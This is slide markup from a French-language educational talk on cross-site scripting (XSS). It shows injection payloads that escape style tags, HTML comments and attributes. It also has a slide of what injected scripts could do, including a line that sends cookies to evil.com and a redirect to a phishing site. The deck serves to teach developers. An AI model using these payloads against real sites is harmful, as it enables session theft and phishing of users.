        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2223925"/>
            <a:ext cx="7772400" cy="697500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="192" name="Shape 192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752112" y="3165225"/>
            <a:ext cx="5639774" cy="2041075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Shape 19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15</a:t>
            </a:fld>
            <a:endParaRPr lang="f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199" name="Shape 199"/>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code faillible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="315862" y="1527412"/>
            <a:ext cx="8512274" cy="4140824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3593625" y="3207075"/>
            <a:ext cx="1761000" cy="6299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2" name="Shape 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5449825" y="4003750"/>
            <a:ext cx="1761000" cy="6299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3" name="Shape 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2652850" y="4757475"/>
            <a:ext cx="2529899" cy="6299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4" name="Shape 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2375700" y="3735875"/>
            <a:ext cx="1761000" cy="629999"/>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5" name="Shape 205"/>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="f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11" name="Shape 21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exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347237" y="1482650"/>
            <a:ext cx="8449524" cy="4110274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 213"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3395500" y="2567850"/>
            <a:ext cx="5476800" cy="401399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF9900"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>blue}&lt;/style&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;style&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Shape 21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17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4532399" y="2895600"/>
            <a:ext cx="1500" cy="567599"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF99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21" name="Shape 22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exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347237" y="1482650"/>
            <a:ext cx="8449524" cy="4110274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Shape 223"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2292725" y="2769137"/>
            <a:ext cx="3352200" cy="401399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF9900"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Shape 22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18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="225" name="Shape 225"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238500" y="3203137"/>
            <a:ext cx="11100" cy="669300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF99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31" name="Shape 23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exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="232" name="Shape 232"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347237" y="1482650"/>
            <a:ext cx="8449524" cy="4110274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925150" y="2917225"/>
            <a:ext cx="2871599" cy="401399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF9900"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>" onclick="alert('XSS');</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Shape 23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19</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="235" name="Shape 235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6642100" y="3276600"/>
            <a:ext cx="11100" cy="825600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF99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26994" y="105309"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Qui sommes nous ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Shape 71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1375075" y="1850150"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5820587" y="1850150"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5911087" y="4565575"/>
            <a:ext cx="1533525" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="420141" y="4779337"/>
            <a:ext cx="3624375" cy="791675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Shape 75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161200" y="3648400"/>
            <a:ext cx="3033300" cy="983099"/>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fr" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jérémy Pinsolle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Développeur à Xebia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-224975" y="3671950"/>
            <a:ext cx="4914600" cy="9360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fr" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pauline Galvao</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Développeuse à Sopra Steria</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Shape 7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a:t>
            </a:fld>
            <a:endParaRPr lang="f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41" name="Shape 24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exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347237" y="1482650"/>
            <a:ext cx="8449524" cy="4110274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2196525" y="5758025"/>
            <a:ext cx="4085100" cy="297899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF9900"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>--&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;!--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 24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20</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4000600" y="5029300"/>
            <a:ext cx="12599" cy="736499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF99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51" name="Shape 25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Exemple : interprétation par le navigateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="327025" y="1726375"/>
            <a:ext cx="8489949" cy="3878875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Shape 25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21</a:t>
            </a:fld>
            <a:endParaRPr lang="f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59" name="Shape 259"/>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Les ALERT sont inoffensives, qu’en est-il de ces scripts ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Shape 260"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1265775"/>
            <a:ext cx="8903100" cy="53322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fr"/>
              <a:t>--- 1 ---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>new Image().src='http://evil.com/steal?cookies='+document.cookie;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--- 2 ---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$.get('/my/contacts', function (response) { … });</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45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>---3 ---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.location.href=”http://phishing.com”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>---4---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>GMAIL.deleteAll();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="f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67" name="Shape 267"/>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Deux catégories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Shape 268"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1418175"/>
            <a:ext cx="8736900" cy="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Script présent dans le système</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Non persistant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Requête portant le script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Url transmise par mail, spam, réseaux sociaux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
